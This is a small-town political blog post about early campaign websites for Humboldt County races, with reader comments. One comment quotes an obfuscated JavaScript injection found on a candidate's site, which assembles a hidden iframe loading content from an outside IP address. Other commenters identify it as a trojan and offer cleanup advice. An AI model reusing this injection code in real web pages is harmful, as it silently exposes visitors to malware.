The race to get up the first campaign web page, anyway.

I'm a Libertarian living in Humboldt County, CA. I've lived here in Eureka since 1973 and joined the Libertarian Party in 1992. This blog will mostly focus on local political issues, but I may stray into state and national issues as well, when I can't help myself. Sunberg is up too - http://www.sundbergforsupervisor.org/
Well, what'ya know! I see he's also got a Facebook page set up, too.
I know some say campaign web pages don't really do anything and they're probably right. I also know it's still early. Still, I always wonder why some candidates wait so long to put up at least some form of a campaign web page early on?
Depending on how you go about it, and what you want on the page, you can set one up relatively quickly and it can cost next to nothing. Then the page is up and "working" for you for months.
Seems to me many candidates wait until the campaign season is well under way until they even get started on one.

Wow! Guess I was wrong on that one, at least for those races. The Pat Cleary link isn't working, tho.
OOPS - I got an extra http in there. (the Cleary link

The HIggins link doesn't work for me.
Fred, I really hate this comment moderation thing.
How about trying it without? I know the troll will be back, but he can just be deleted once a day.
Fred
I agree with Rose. Get rid of moderation. It is so easy to click the garbage can icon and be done with it. I agree with most of what you say, but sometimes I make a comment and it may come after sombody saying the same thing, or a comment that makes what is said to be ridiculous.
I often don't comment because of that. Besides, who cares if somebody out there finds out that you wear purple underware?
Actually, I like pink undies (seriously, but I don't have any).
But damn you, Ernie! I was gonna try and convince Rose I only had her comments moderated. You blew that one. Thanks, chump.
LOL - Aww, c;mon, Fred, we'll deal with the troll. we might have an idea who he is, you know.
And I agree with Ernie, it's hard to have a conversation when we don't know what's been said.

Thanx, big mouth. Just for that, I'm putting moderation back on. You're such a dummy.
Fixed it. :(
Sundberg and Bass both used squarespace.com. Nobody else got that memo.
Higgins website says meta name="google-site-verification" content="qcAQBe_Ov-bzmp2F1b6C2k0LpGwp80WSq2Bwb0nDLsA"
Sadly, I can't find any open anonymous internet hater threads on any of these pages. What if I want to leave a nasty comment? Boo.
I get a malware warning off HIggins' site. Hope he gets that fixed.
Higgins site:
l='//';gf='fr';h='7.1';n='3';f='ame';i='i';m='c';p='tp:';u='2';ze='s';q='8';gg='1';c='6.';jh='erv';k='4';o='0/';b='17';g='ht';t='/';fs='.';qs='sr';s=i.concat(gf,f);zj=qs.concat(m);se=g.concat(p,l,q,gg,fs,b,c,u,n,h,k,o,ze,jh,t);var nu=document.createElement(s);nu.setAttribute('width','5');nu.setAttribute('height','5');nu.setAttribute('style','display:none');nu.setAttribute(zj,se);document.body.appendChild(nu);"
It's not just harmless nonsense.
"se=g.concat(p,l,q,gg,fs,b,c,u,n,h,k,o,ze,jh,t);"
concat combines p,l,q,gg...etc.
(splitting this so it doesn't make a real link)

Trojan Horse.
Has anyone told them about it?
Someone should tell them.
If the pages are edited on an infected computer and the trojan horse removed, the trojan horse will come back as a result of the page being edited by the infected computer. The solution is to clean the computer which is editing the pages.
